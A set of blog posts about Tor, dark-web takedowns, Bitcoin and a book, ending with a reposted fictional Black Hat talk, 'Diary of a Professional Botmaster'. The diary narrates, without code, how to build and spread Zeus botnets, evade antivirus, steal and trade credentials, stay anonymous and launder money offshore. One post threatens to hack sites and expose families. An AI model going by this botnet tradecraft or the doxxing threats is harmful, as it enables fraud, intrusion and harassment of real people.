Tor Wacky Times and the NSA

gAtO rEaD – that Tor (The Deep Dark Web) is now all messed up by the NSA, FBI and LEO so all you bad guys using the Tor network better watch out, or should they???fed_links_01

Aug 5 the FBI snakes in Freedom Hosting and put a number of websites out of business in the Dark Web. They let the flames go out that they caught a bunch of Pedophile sites with that bust, but it does not seem so.

The Attack on the Dark Net Took Down a Lot More Than Child Porn – – gAtO contribute to this article–

fed_usCitizenship_01Aug 19 – Millions of Tor Clients start to go up in numbers. What’s this all about, we get a bunch of Tor clients just hanging around doing nothing in Tor. Some say it’s a Bot-net or something like that. Then it growns 4, 5  million Tor users and the last week or so it starts to go down again. So what is all this about all these Tor Clients and the Tor- Botnet?fed_rent_a_hacker01

Oct 3– Silk Road get’s taken down, Oh the FBI had a copy of the Silk Road servers back in June just before the AUG 5 take down of FH by the FBI. So the Feds had Silk Road all this time and this is all they can do, can’t even get a few Bitcoin wallets- what a cluster fˆ%k—//fed_cc-paypal_01

Now you got NSA saying that Tor is cracked and the bad guys cannot use it. They claim that they can hack Tor anytime and anywhere with documents that a summer student left on how to hack the Tor network back in 2006. By the Way – most of these hacks do not work in Tor, maybe on a regular network but not on the Tor network.fed_hit_man_01

So now gAtO goes in search of Tor sites and a lot of sites went down by hook or crook —BUT someone has started to replace these Tor Hidden Websites in the Tor Network – But something is FuNnY – all these sites us the same web templates –

So now you can take a walk down memory lane and see all the older Tor-Websites have gone away and new ones have magicly re-appear.

fed_apple4bitcoin_01Now if this was the only place were this has happens OK sure, but at other Tor- Wiki Tor Link sites you will see the same thing – Commercial sites are all FuNnY and all the non-commercial Tor-websites are Tango Down.

So now Tor goes round and round but nobody knows what the heck is going on- In the Tor network – The Deep Dark Web run by Criminals or the FBI – you can answer these questions yourself by visiting the site –trust but Verify– ((not me))– gAtO oUt

fed_counterfiet_euro_50 fed_counterfiet_usd_01 fed_links_01 fed_mobile_steal_store_01 fed_uk_guns_01













Is the TorProject protecting Pedos?

Update: 01-26-2013 – It seems that the is now threatening poor little gAtO because I voiced my opinions and disagree and question their practice of protecting pedophiles. So the TorProject that say’s they support “Freedom of Speech” now is trying to used it POWER to abuse people who disagree with them. This shows to me that I am very closed to the truth. Why would they be offended and why would they threaten a disable veteran that is only trying to help children by questioning it’s practice of supporting pedophiles in TOR.

This ABUSE of power upon the weak is what the TOR-Project claims it is trying to protect. This is the same tactics that corporations, governments that feel entitled think they can silence “Freedom of Speech” – Well Mr. Andrew Lewman of TorProject anytime, anyplace little boy. You are a coward to hide behind the Tor-Project and think you can get away with your abuse, your threats, your intimidation. gAtO is Ready- Fire at will.- hit me with your best shot.


gAtO hAs his ClAw’s oUt psssss- I have been working on a project to fight pedo website in the Tor-onion network – (The Dark Web- the underweb) what ever you want to call it. We all know that Pedophiles as well as other criminals are hiding their websites inside -Tor-hidden service. So I contacted one of the torproject people – we will call him Andrew.

When I told them that I was working on getting rid of Pedo websites in Tor and I asked “why they just don’t delete these URL from the directory”, he told me:cyber_speech

“It’s so toxic, most law enforcement cannot touch it either. You should report these links to“> at a minimum. See for the longer explanation.”

—The Missing Kids network cannot do anything about websites in the Tor-network –hidden service.—/

This made me sick from the TorProject site –We refuse to weaken Tor because it would harm efforts to combat child abuse and human trafficking in the physical world, while removing safe spaces for victims online. – SAY WHAT!!! – Here we are we know the URL of PedoBear and hundreds of Pedo site in the Dark Web and they keep the real directory of all sites in the 10 Authority servers – they could just go and delete these known Pedo websites and then they would have to generate another URL and re-advertise and get back the customer base.

“Hay Anonymous we need your help”

You ever wonder why everyone vilifies the dark web (Tor) this is the reason why, get a clue TorProject.

That is a lot of work for these monsters – We in the cyber security field know all this and if we can get together and help we could help these children and protect them from these cowards. No, No the Torproject is so arrogant and delusional that they make these statements on their website and – well that’s all I have to do. – gAtO don’t get it.

I respect the efforts of the TorProject and what they do to help “freedom of Speech in cyberspace” this is my core belief, but to claim to help child abuse by leaving these sick website online. – That is madness – I cannot believe that Roger and Jacob worked as hard as they did to build such a great tools that is saving lives but when it comes to children they turn a blind eye.

I hope they see this post and think of the millions of children that suffer because they choose to do nothing. I hope they sleep well at nights knowing that pedophiles are loving their Tor-hidden service where they can do whatever they want with children and get away with it.

Shame on you TorProject – all I can say is that gAtO will work hard to find and destroy these websites.

 – we have rules and pedophiles have no rules –not on my watch

I know behind the Tor-hidden service is just a basic website with the normal vulnerabilities and from my research some of these use old web apps that are vulnerable. So be warned gAtO  is a gray hat and I’m hunting you. I will find you and exposed you, I will expose your family,  I will shame you, I will send you to jail in what ever country your in, were I hope they treat you like you treated these helpless children.

TorProject I expected more from you, I expected you to have a heart and help these helpless children- gAtO oUT


Tor Users in South America

gAtO – was thinking about the different Tor users in Latin America while checking for a project and this made me wonder what is really going on. Let’s take a look at Brazil first:

All my charts will include from Jan-2012 to Jan 2013 –

Brazil shows from 170k users to 100k users this is normal for Brazil as one of the largest country in SA – But the problem I see right away is the Bridge Relays – these are the kinda secret OR that people use to hide if they think they are being monitored you can see that they have gone down Big-Time- why is this happening I have to ask myself. Is ti that people are becoming more confortable and do not fear the government or are the actual bridge-relays just going down.

Next We go travel Down to Chile:

and we find that they do not have any OR but they have from 1000 users toa high of 1800 users :

Some of the other things is I cannot find OR for quite a few countries Like SPAIN that is ODD and Argentina has over 8 sometimes 10 OR for a Tor users this just makes no sense I also checked for bridges OR but every where there use has gone down – I guess that they are becoming more confortable that Tor works and just go with normal automatic Tor selection.

Let go up and check out Mexico – this one took me by surprise – Only 1 OR – I will have to setup some more test with some new Tor Tools I am working on to get a better picture of what the heck is going donw with Latino Tor Users worldwide – – adios amigos- gATO oUt 

1_sa_ar_or 1_sa_ar_user 1-sa_br_users11_br_brazil1_sa_chile_br_usr 1_sa_chile_usr 1-sa_belize_usr 1-sa_columbia_usr11-sa_colunbia 1-sa_dr_usr 1-sa_ecuador_usr 1-sa_elSalvador_usr 1-sa_mx_bridge_or 1-sa_mx_tor-OR 1-sa_mx_usr 1-sa_panama_usr 1-sa_parguay_usr 1-sa_peru_usr 1-sa_pr_usr 1-sa_spain_usr11-sa_spain 1-sa_vebazuela_usr11-sa_venezula



















Happy Satoshi Nakamoto -Bitcoin- Day Nov 1

gAtO wAs- thinking about one of my heroes SATOSHI NAKAMOTO only 4 years ago November 1, 2008 he posted the research paper describing a new digital currency called BITCOIN. He cracked the problem that had stumped cryptographers for decades a DIGITAL CURRENCY convenient and untraceable with no over site from any government or bank.


gAtO’s –> gAtOmAlO sAy – I am Satoshi Nakamoto

Ecash was the first as early as 1990’s but they failed because they relied on governments, banks and credit card companies. Banks and governments own us, the bank owns your house that your paying off, You pay tax’s on your property while the bank owns it. We all pay interest and the bankers live only for interest.

As anyone can see it’s in the best interest of all banks and governments that all world wide digital currency fail, unless they control it. It’s NOT only numbers, math and cryptology that makes these bankers shake in fear. But losing control of peoples moneys. Who Wins?  It’s the people immune to printing press happy -Federal Reserve bankers having all the control. The bankers cannot control this new digital currency control by people that have Nose rings -/ so they vilify these people -/cyberpunks that spread the word of their guilt. They make Bitcoins evil- Wikileaks is evil -the scum in the black market like Silk Road-  and Black MArket Reload use it so it’s evil –with your logic all Bitcoin is evil,

So congressman, senator when you paid that hooker on our tax dollar, when you pay the young man to have sex with you from Ohio – the swing state –/ the US  money you use is as EVIL as Bitcoin because it was used in a evil crime…. Evil is evil, money is money. simple to gATO sorry I rage—-

Political pressure has been payed by the banker to People like Senator Schumer which I used to like SCREAMED at the DEA to SHUT DOWN Silk Road which he called “the most brazen attempt to peddle drugs online that we have ever seen” – Yeah Silk Road is still ONLINE last I check. I guess the DEA can’t mess with cryptology and math. It’s science guy’s it basic and simple and elegant and it works. Tor onion network uses math and cryptology and it works so why can’t a digital currency like Bitcoin work.

BITCOIN CANNOT WORK – it’s beta software boy and girl – SATOSHI told us before he disappeared (2010) as he appeared ” in mystery” . SATOSHI is a cult hero “invisivle and  anonymous”– he warned us when he saw Wikileaks use Bitcoins as a donation tool -(this was the introduction of BITCOINS to the whole wide world -/- that it was still to early –/Bitcoin was only 2 years old at the time/  – SATOSHI  final words were “Bitcoin is pocket change (21 Million max Bitcoins) the heat you bring (from the exposure to the gov’s and banks and the world) would likely destroy us at this stage”.

SATOSHI was trying to warn us that the Software Bitcoin is only the beginning of digital currency. As gAtO see’s it in his loco-world mind view —/ If the people control their own money, next people will want to govern themselves and THEY have seen the effects of the Arab Spring and other cases were “the people” took back their country back from currupt politicians. Follow the -DIGITAL currency – gAtO oUt 

The deep Dark Web -Book Release

gATO hApPy – 


AVAILABLE @SmashWords website  @

I learned that I hate WORD: – but it’s the general format for publishing  – text boxes- get imbedded and you can’t format to EPUB or .mobi or anything – solution after going lOcO gAtO – was copy and paste into txt editor – save as RTF then copy paste back into a new WORD document and then reformat everything from scratch – and copy over the pictures – as you can tell I had fun-..-ugh mEoW F-F-F-F as much fun as a hairball but if it get’s the message out “FREEDOM OF SPEECH IN CYBERSPACE” then we done our job, anyway I hope you read it Thank you Pierluigi a best friend a security gAtO ever had – gATO oUt

This Book covers the main aspects of the fabulous and dangerous world of -“The Deep Dark Web” . We are just two cyber specialists Pierluigi Paganini & Richard -gAtO- Amores, with one passion and two souls we wanted to explain the inner working of the deep dark web. We have had a long collaboration in this efforts to document our findings we made infiltrations into the dark places inaccessible to many to give a you the reader a clear vision on the major mystery of the dark hidden web that exist today in the Tor Onion network..

The Web, the Internet, mobile cell devices and social networking has become commonly used words that identify technological components of daily Internet user’s experience in the cyberspace. But how much do we really know about cyberspace? Very, very little, Google / Yahoo / Bing only show us 20% of the Internet the other 80% is hidden to the average user unless you know were to look.

The other 80% of the Internet is what this book is about the “Deep Dark Web”, three words with millions of interpretations, mysterious place on the web, the representation of the hell in the cyberspace but also the last opportunity to preserve freedom of expression from censorship. Authorities and corporation try to discourage the use of this untapped space because they don’t control it. We the people of the free world control this network of Tor -Onion Routers by volunteer around the world.

The Deep Dark Web seems to be full of crooks and cyber criminals, it is the hacker’s paradise, where there are no rule, no law, no identity in what is considered the reign of anonymity, but this is also the reason why many persecuted find refuge and have the opportunity to shout to the world their inconvenient truths.

The Deep Dark Web is a crowded space with no references but in reality it is a mine of information unimaginable, a labyrinth of knowledge in the book we will try to take you by the hand to avoid the traps and pitfalls hopefully illuminating your path in the dark.

Cybercrime, hacktivism, intelligence, cyber warfare are all pieces of this complex puzzle in which we will try to make order, don’t forget that the Deep Dark Web has unbelievable opportunity for business and governments, it represents the largest on-line market where it is possible to sell and acquire everything, and dear reader where there is $money$  you will find also banking, financial speculators and many other sharks.

Do you believe that making  money in Deep Web is just a criminal prerogative? Wrong, the authors show you how things works in the hidden economy and which are the future perspectives of is digital currency, the Bitcoin.

This manuscript proposes both faces of the subject, it illustrates the risks but also legitimate use of anonymizing networks such as TOR adopted by journalist to send file reports before governments agents censored his work .

Here are some question we may answers to:

How many person know about the cyber criminals and their ecosystem in the deep web? 

How many have provided information on the financial systems behind the “dirty affairs”? 

How the law enforcement and governments use Dark Web?

Let’s hold your breath and start the trip in the abyss of knowledge to find answers to the above questions. We hope that with this book you can learn something new about – The Deep Dark Web.

Diary of a Professional Botmaster

gAtO –found this and had to share with you. If you want to know how a botMaster is created check this out. A simple software engineer becomes a botMaster sounds like “surreal Walter White in Breaking Bad”. First you will noticed that this was written in 2010 and it’s been a model of the botMaster persona. This is a fictional tale now add the Tor onion network to hide the c&c and mobile Android /iApple devices but it comes so close to the real edge, have fun reading -gAtO oUt

Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

 Diary of a Professional Botmaster 

June 20, 2009 

I’ve decided to restart the diary. I used to keep one many years ago, but stopped when I moved down to London and started my MSc in Computing & Security at King’s College – much use that degree ever turned out to be!

I found out yesterday that me and most of the team are going to be made redundant at the end of the month. It appears that the company doesn’t need so many developers after they decided to sell off the Private Banking division to some German brokerage and they ditched those annoying trader guys up on the 18th floor a couple of months back.

Anyhow, I’d better start looking for a new job. The markets pretty tight at the moment. It seems that all the banks are laying off folks and the developers are the first to go. Not surprising really. I’ve been thinking about setting up my own business for a while though. Perhaps it’s time to bite the bullet and just do it. Take that redundancy cheque and invest it in myself?

June 22, 2009 

Was down at the pub for most of the afternoon with Bill & Ted. We were tossing around ideas of businesses I could start – in particular, businesses that could make me a millionaire in a year’s time. Granted, most of the ideas were completely off the wall and would be destined to fail or end in my bankruptcy within weeks of starting them (or would likely land me in prison within short order) but some of the grey areas look like they could be pretty exciting.

Ted was going on about botnets and how they’re not really illegal. Sounds like rubbish to me, but I’ll check it out anyway.

Last year when we had that worm go around the office and the Ops guys spent a couple of weeks chasing it down and cleaning up systems – that was pretty cool, and I can see how the authors of that worm could make quite a bit of money from it with a little banking knowledge. I don’t think they ever got caught either. Ted told me that James – the lardy guy over in second-level helpdesk – said that they were still having outbreaks of that very same worm and uncovering other infected computers almost every day (after an entire year). How cool is that!

June 25, 2009

I’ve been reading up on botnets. The Internet is full of great information about them. YouTube even has tutorials on how to create the malware, deliver the bot agents, manage the Command and Control (CnC) and turn the stolen data into real money.

I did some digging on these hacker forums too. They’re pretty cool. Most are well organized and there are bundles of tutorials, guides and discussion threads on all aspects of the botnet business. There’s even entire forums dedicated to matching buyers with sellers – Craigslist style! Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

June 26, 2009

Had a great session with Demitri over IRC today. He’s been running a handful of botnets over the last couple of years and seems to know what he’s talking about. Came across his advertisement on one of the boards and was offering a free 2-hour test-drive of his botnet CnC console – so I got to play with a couple hundred computers. Some of the functionality was grayed out, but I got a chance to DDoS the companies’ website – from the comfort of my desk ?

I spoke with a couple of the company Internet ops guys afterwards – being careful in what I said of course – to see if they noticed. Apparently they did. It didn’t bring down the site, but they were alerted from their IPS. Supposedly this is a common enough occurrence and happens most weeks. I guess I’m a little disappointed with that. I wonder how many bots I’d need to take down the webserver?

Dimitri said that he normally uses about 5,000 bots to take down big websites – but 200 is more than enough to wipe out corporate VPN appliances. Handy to know!

June 27, 2009

Sat down with Jim the lawyer this afternoon. I wanted to go over the details of setting up my own contracting business. Since I haven’t had much luck on the replacement job front looking for permanent roles, I figured I’d just go down the contracting route – since there are more opportunities going for temporary software engineering positions.

There’s not much to creating your own business. Jim helped me with all the forms – so I just need to mail them off tomorrow, and I’ll be on the way to creating my first business. He also explained some of the nuances to setting up a company in some other countries and the possibilities of “offshore accounts” and tax havens. I took plenty of notes. You never know when that’ll come in useful.

June 28, 2009 

Spent all day harvesting hacker boards for tools and playing with them on a couple of old laptops. This stuff really is easy.

I even came across this guy(?) on one of the chat forums (who can’t have been more than 14 years old) who was selling a botnet of 2,000 computers for $400. The funny part though was when the flame war stated about how overpriced that was. Apparently you can pick up 2,000 computers for as low as a $50 Walmart giftcard.

June 29, 2009

I woke up this morning with an epiphany (or was it just a delayed hangover?). I’m going to start my own botnet – but not just any botnet, I’m going to do it properly and make a business from it! I’ll still pursue any legit consulting roles that crop up – still got to eat and pay the bills – but it’ll make a convenient front while I’m building botnets.

Why the botnet business? Because it’s cool! Well, actually, it’s more than that. I don’t want to work forever in a dull office job and, from what I can tell, botnet building seems to be pretty profitable – and not many people get caught. And, if they do get caught, they basically only get a slap on the wrist. Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

Having read quite a few of the news articles about the folks that got caught, it looks to me that they got caught because they did something stupid and/or they clearly crossed the criminal line – and the police were forced to do something about them.

I’m pretty sure that I’m smarter than that. Didn’t any of these guys ever consider building a business plan first? Plan it all out – have a strategy and stick to it!

I’ve left the computer downloading a few tool collections I found on one of the Argentinean malware blog sites. 4Gb of tools, kits and exploits. Awesome! And it’s all free!!

June 30, 2009

Final pay date from the “old job”, and I’m now officially free of the company. Ended up with a little over £35k after taxes too – so that’ll tide me over the next few months as I pull together my new business(es).

Last night’s download worked out pretty good. There are hundreds of botnet kits in there – complete with CnC interfaces, exploit packs, phishing templates, malware creators and obfuscators. Supposedly there’s a high likelihood that many of them are backdoored, but who cares – it’s time to play! I’m going to try a couple of them out on the corporate laptop before I have to hand it back – preferably one with a good rootkit. I wonder if they’ll ever notice?

July 1, 2009

Woke up this morning having dreamed about what kind of botnet business I want to build. Also figured out a few “rules” that I want to work towards – maybe more of a “guiding principles” perspective really.

1. DON’T GET CAUGHT – which means I’m going to be damned careful in setting up everything and making sure that nothing can be traced back to me personally. Sure, there’ll be layers to the onion, but I’m not going to allow myself to be let down by poor tradecraft and bad habits. Those hackers in France and Spain got caught because they didn’t have enough layers of deniability and mixed the use of their personal systems and their botnet infrastructure.

2. DON’T DO CRIMINAL HARM – While I’m pretty far removed from planning on being a Robin Hood, I’m not going to get mixed in with the Mob or other organized crime. Similarly, I’m not going to get involved with any political or religious drivel. I also don’t want to cause any physical harm – as that’s a sure way of getting the interest of the police – and, besides, it’s not who I really am. The more legit I can make this business, the easier it’ll be to bow out after I’ve made my money.

3. RESILIENCE AND SCALABILITY ARE MY FRIENDS – Since this is going to be a business, based upon the lessons I learned from the Private Banking firm and all I’ve been reading over the last couple of weeks, it should be possible to build pretty big botnets really fast – if I plan it well.

Resilience will be even more important though. Getting back to the “don’t get caught” principle and the layers of deniability (and abstraction), if I plan for making the CnC and distribution systems robust, I’ll endeavor to split things over Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

several hosting providers and geographic regions.

Also spent some time on the hacker portals and responding to some of the threads. Some of the more interesting forums are currently closed to me because I haven’t developed a site reputation – which can be gained by posting 20, 50 and 100 messages. This’ll be pretty easy though. Lots of questions about coding problems which I can answer without too much thought.

July 3, 2009

I think I’ve managed to plan out a few more CnC infrastructure ideas. I found a few more tutorials online – and also some good message threads on domain registration tactics, Dynamic DNS operators and folks that’ll distribute malware for a few cents. It appears that a good rate at the moment is around $100 for 2,000 guaranteed installs. A little pricey if I was buying, but it sounds like good money if I was to become a seller ?

I also realized that I forgot a rather important principle for inclusion – my zero’th principle…

0. I WANT TO BE RICH – but, more to the point I want to retire rich, not be the richest bloke in jail.

Which all means that I need to do some more investigation on how to secure the money. I don’t want the money to be directly traceable to me – nor to the consulting company I’ve just created – but I’m going to need ways to pay for stuff and ways to accept payments. All deniable of course.

Made a few new connections on the hacker forums. Now that I’m posting to some threads I’m getting direct messages from some of the folks there. A couple of the guys that reached out were trying to pimp out their services – both of them malware dropper services. Someone else asked if I was with the FBI.

The USA perspective was interesting. I hadn’t realized that the guys on the forums can see/track my IP address and from there work out where I’m located. I’ll have to do some experimenting with anonymous proxies and TOR networks. I ran across a few video tutorials on the topic yesterday. That’ll be my homework for this evening – getting something setup and hiding my IP address forever more…

July 4, 2009 

Surprise in the snail mail – company papers just came back. I’m now the CEO of Thrull Networks! Cool company name huh! I wonder if anyone will ever figure it out – thought it was apt at the time. Maybe it’s a little too close to the mark. 5% on the dumbness scale I guess. Will have to be smarter in the future. I’m going to keep it though. Even saw that some related .com and .net domain names are available for registering.

Earlier this morning I went out and bought a couple of new laptops. Nothing special, just some small(ish) $800 laptops that I’m dedicating to my botnet business – and will never taint them with the Thrull Networks consulting business. Although I will be claiming them as tax deductable expenditures. Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

Also spent most of today coming up with the rules I’m going to work under for achieving principles (1) and (3)… and maybe a little of (0) too.

So, the new rules…

A) Separate systems for work/pleasure/personal and botnets. The two new laptops are JUST for the botnet business. I’ve already installed a full disk encryption scheme and come up with a 44 character password. I doubt that anyone’ll be breaking that mother anytime soon.

B) Never connect to the botnet CnC or do any botnet-related business from my home network. Given the general availability of free WiFi at Starbucks and McDonald, etc., I’ll use those. A couple of additional rules there though – don’t frequent them in a regular pattern (sounds like a Tom Clancy spy novel), and don’t use stores that have CCTV setups. I was tempted to use some of the unsecured WiFi networks in the neighborhood – but that may be a little too close for comfort. Besides, the coffee will be better than what I have at home.

C) Change the MAC on the laptops regularly. I’ve already downloaded and installed a cool piece of software that does precisely that. I’ve also installed a bundle of different Web browsers – but have deliberately not installed any plug-ins etc. I was reading recently a couple of online projects that showed how they could query your Web browser through JavaScript and the DOM to build a signature of the browser – and how “unique” that became once you started installing plug-ins and how regularly you kept them patched. So I’m planning on keeping the laptops as simple and “dumb” as possible.

D) Never connect directly to the botnet infrastructure. Lesson learned yesterday. TOR and anonymous proxies are now default on all my computers – especially the two new laptops!

E) While encryption is my friend. Asymmetric crypto is going to be my live-in lover. Thanks Bruce for the tips!

July 9, 2009

Been playing around all week with the DIY kits I downloaded a couple of weeks back. The Zeus kit is pretty impressive with its polymorphic malware generator. I was running its output past some of the free online antivirus scanning portals and noting which (if any) antivirus tools detected the samples. On average, only a couple of the AV tools detected anything – and if they did, it was only some kind of generic signature such as w32.suspicious etc.

I was originally using, but when I tried to find other AV portals that might have more AV products in them I stumbled over a couple of cool threads that explained why I shouldn’t use that site (and a few others) because they share the malware samples with the AV vendors. Therefore the AV vendors will have detection signatures for the malware out within a few days. That sucks – because I probably just wasted a few dozen cool pieces of Zeus malware. Luckily there were plenty of alternative AV testing portals being recommended and (yet more) tutorials on how to set up your own malware QA testing regimes. Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

I’ve settled on now. They charge a few dollars for the privilege of testing the malware I submit, but they allow me to upload multiple malware samples simultaneously in bulk format. They also have some other services for checking out the malware delivery websites too – so you can check to see if the exploit packs used by the Zeus kit (and others) are correctly installed and whether the other AV components (e.g. HIPS) detect the infection. Their VIP account is $50 per month. I’ll have to figure out a good way to pay for the service. Something that can’t be traced back to me personally…

July 10, 2009 

I spent the entire morning down at the Starbucks down by the park using their “free” WiFi. Cost me about $26 in coffee for the 4 hours.

Anyway, I set up a handful of free webmail accounts. A couple of Gmail accounts, a couple of Hotmail accounts and a couple of Yahoo accounts. I entered in garbage “personal” information, but gave them all the same password – “Lucky4Me*Unlucky4U”. They’re disposable accounts for trialing out a few new concepts and learning what works.

Next, I created a couple of websites to host the Zeus CnC console pages. I had originally been worried about how I was going to have to pay for the web hosting – but a quick search for “free web hosting” revealed plenty of services – including portals that provide detailed reviews of all the providers. Woohoo.

It took me about an hour to create the sites on It’s the first website I’ve ever built – and I had to learn some PHP while doing it all. On the job training if you like. The index page is just a copy/paste job from some car-parts website – and the Zeus CnC configuration and bot registration pages are off in a subfolder. They’re accessible if you know the URL, but they’re intentionally not linked to from anywhere. I don’t really want some search engine crawling the sites and flagging the Zeus CnC.

I’ll be spending some time later tonight generating some malware samples that’ll use the two new CnC URLs. That’ll be hard work – should take me all of 10 seconds ?

July 11, 2009 

A botnet is born. I’m a father!

So, this morning I headed off to the Starbucks over by the athletics center to play with my newly minted malware and the CnC services.

I originally set up a VMWare session on the laptop and infected it with the new malware bot agent and watched it reach out to the CnC server. Meanwhile I browsed to the website, logged in to the CnC console, and saw the test victim register itself – so I spent a good half hour testing out all the features of the bot agent. It’s pretty slick. Ugly, but slick. The toughest part of all this was setting up the TOR agent to provide the anonymous web access in reaching the CnC console.

To get the bot malware into play I decided to upload the samples to the Newsgroups – since they don’t require me to host the files directly and also provide anonymous Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

uploading. One file I named “Windows7KeygenCrack.exe” and the other “iTunesDRMRemover.exe”, and included some BS text about how good the tools are. They were both uploaded to a handful of different alt.binaries. groups using different email accounts and source IP addresses.

I hung around Starbuck for another hour, but didn’t see any victims appear on the Zeus console – so paid a visit to Bill & Ted and grabbed lunch with them in town. Ted’s already gotten a new job at some Scottish bank. Chose not to tell them about my botnet research. The ideas may have come from them originally, but I’m not about to share this secret.

Anyhow, I popped in to the McDonalds by the railway station at about 4pm and connected to the Internet to see how my “botnet” was coming along. Surprise, surprise, I had three new members to my botnet. How cool is that! I was well chuffed with that small success and subsequently spent an entire hour connecting to each computer and checking out what I could access on their systems. Just as I was about to pack things up and head off home a fourth computer joined my botnet.

I couldn’t stop smiling on my way home from McDonalds. I think I may have even said “I’ve just fathered my first botnet” somewhere on the walk up the hill. Haha.

Guess where I’ll be tomorrow morning…

July 12, 2009 

Got to Starbucks early this morning and was online with my baby botnet by at least 9:30am. It had swollen over night and the counter had reached 18 computers – but I could only contact 6 of them. The others must have been turned off or something.

For the next hour (and second cup of Java) I created a couple dozen new malware bot agents and configured them to point to the same two Zeus CnC servers I’d set up yesterday. I then went on to use the same Newsgroup tactics – but picking a few other juicy social engineering file names (and descriptions) – e.g. “AcrobatProfessionalKeygen.exe”, “RossettaStoneLanguagePackUnlocker.exe”, etc.

By the time I left the coffee shop the botnet had grown to 23 computers – mostly in the US and the Netherlands, but a couple from Australia and Taiwan.

Went home afterwards to do some more studying and recon, and found some good information on how to automatically pull back account and identity information from Zeus malware clients. There are a number of scripts that you could run automatically on each botnet computer to extract their webmail credentials, anything they’ve told their IE or Firefox web browsers to remember, etc.

I also found some plug-ins for the Zeus CnC console that help to manage the data that comes back from the keylogger and other info-stealer components – which I installed on the web servers later on my return trip to Starbucks – and left CnC commands for the botnet malware to automatically start collecting and uploading the identity information. Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

By 7:30pm my botnet had reached 200 members. It’s no longer a “family unit”; it’s a small village and I’m Pastor of the flock.

July 14, 2009

Had a couple of contract interviews yesterday, and hadn’t managed to check on how my baby was coming along for a couple of days. So, it was with a rather pleasant surprise I noted that the botnet had reached 3,320 computers.

Actually, I’m not so sure about the number and whether it’s a good number to rely upon. The number of computers “active” were about 450 – and I tested that I could control them OK. As for the rest, well, they were “offline” – but I did have files from all 3,000+ computers sitting on the CnC server – so I guess they were successfully compromised with my botnet agent.

I moved all the files off the two CnC servers and copied them to the laptop. When I got home I started doing some analysis.

Brief stats (for posterity)…

942 Facebook accounts

766 Twitter accounts

322 Gmail accounts

318 Hotmail accounts

193 Yahoo accounts

76 Paypal accounts

… and lots of sub-50 accounts – many for services/websites I’ve never heard of before. All told, about 5,500 different accounts.

BTW I’m not sure I like using Starbucks – I’m spending too much money on coffee there ?

July 15, 2009

The botnet’s now reached 4,000 computers.

There was an email from waiting for me from yesterday. Apparently I should be upgrading to a paid account because of all the traffic/hits the site has been receiving. Just as well I moved off all the identity information and files – I was almost over the file quota too!

July 16, 2009

4,300. What’s the population have to be before a village can be called a town?

Created another couple of dozen malware for release on the Newsgroups since the botnet growth appeared to be slowing down.

July 17, 2009 

I think I’m the Mayor of a small town now. I visited the Starbucks down by the strip mall this afternoon and logged in to the botnet. 11,435 computers!

At first I thought it may have been a mistake since the size jump was so large. Introducing a couple new malware downloads didn’t get that much of a leap last time. But I figured it out after about 20 minutes of probing and searching. It would seem that the new file “MichaelJacksonDeath-OfficialAutopsyReport.exe” was more successful. It also managed to make its way on to some Torrent server and plenty of people are downloading it.

New lessons learnt from yesterday’s efforts: Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

1) Tying social engineering to media and entertainment current events results yields more additions to a botnet.

2) Torrent networks can make the botnet malware reach more people faster.

July 18, 2009

Just as well I downloaded all those new files yesterday, because the botnet is dead. I’m no longer the Mayor.

This morning I popped on over at the Library for a bit of their WiFi access and tried to connect to my CnC servers. Nothing – well, more than nothing, the Zeus CnC pages had been deleted and my webserver account had been disabled. There were instructions to phone the helpdesk to discuss reactivation.

Waiting in the inbox of the webmail account I used to register the free websites was an email telling me that my site may have been hacked and was being used for malicious purposes.

A quick Google revealed that both CnC URL’s and configuration files were listed up on


July 19, 2009 

All is not lost. I’ve still got all those identity/account detail files from all my botnet computers. The total – adding the first batch with the batch from the 17th – comes to a little shy of 19,000 unique sets of credentials. I can still access any (if not all) of those stolen accounts anytime in the future.

Better yet – there’s absolutely nothing that can be tracked back to me. Sure, the botnet is now out of my control (and computers are still being compromised with the malware which is still in circulation in the Newsgroups and Torrents), but I’m safe and have learnt a few new lessons.

That said though, it’s about time I started to focus on bringing in the money from the botnets. I’m not going to get that Porsche building botnets for botnets sake. I could easily enough find buyers for the stolen information – the hacker forums are overflowing with buyers and agents. That’s not a problem. The problem lies in converting “Internet money” into cash – and laundering those transactions sufficiently.

With that in mind, I spent all afternoon researching offshore banking and the creation of anonymous accounts. Disappointingly those infamous Swiss Numbered Accounts don’t exist anymore – at least not like they do in the movies.

I managed to narrow it down to three banking accounts and, as my finances grow, I’ll start to bring them on line. I’ve found agents that will allow me to set up Swiss banking accounts online. They require proof of address, but they provide a level of guarantee that personal information will not be supplied to anyone outside of Switzerland. The Cayman Island accounts are easier to set up – and don’t require an agent – but require a higher deposit. They’re a little too rich for my tastes at the moment – but I’ll probably add an account once I break the $100k per month revenue stream (if ever?). Becoming the Six-Million-Dollar Man Blackhat USA 2010 Gunter Ollmann 

No, the account I created online this evening was for a Panama Bearer Share Corporation account. As of an hour ago I’m now CEO of a second company – “Net Wizards LLC.”. I deposited $5,000 into the account. Not only does it provide an anonymous business front and full international banking facilities, but it comes with 4% interest and the credit cards issued against the account should be arriving in 10 days time.

July 20, 2009

I’m back in the botnet business!

I was keeping a couple of my hacker forum accounts live by responding to a few message threads and I stumbled across a couple of reputable botmasters that were in the process of selling off sections of their botnets. They were offering batches of 100 bots with dedicated CnC hosted servers for $200 each.

Most significantly though – there were alternatives to the $200 in Webmoney or PayPal funds – they’d accept hacked webmail accounts, Facebook accounts and Twitter accounts.

After a little back and forth, we agreed on the trade and exchange mode (had to use an agent that was pre-vetted on the forum – one of the administrators – who charges 10% for his time/effort). From X4cker I picked up 600 bots and two CnC servers (in the Ukraine no less) for 3,000 Gmail accounts and 1,000 Hotmail accounts. From Dankar007 I managed to procure 500 bots for the princely sum of 500 PayPal accounts. The site administrator/agent didn’t do too badly out of the deal either. I’m sure that he (or she?) now has his own copies of all those accounts.

After some quick verification and having tested the access to the two botnets, I created a new Zeus botnet agent and pushed it down to all 1,100 bots – and changed the admin credentials on the CnC servers.

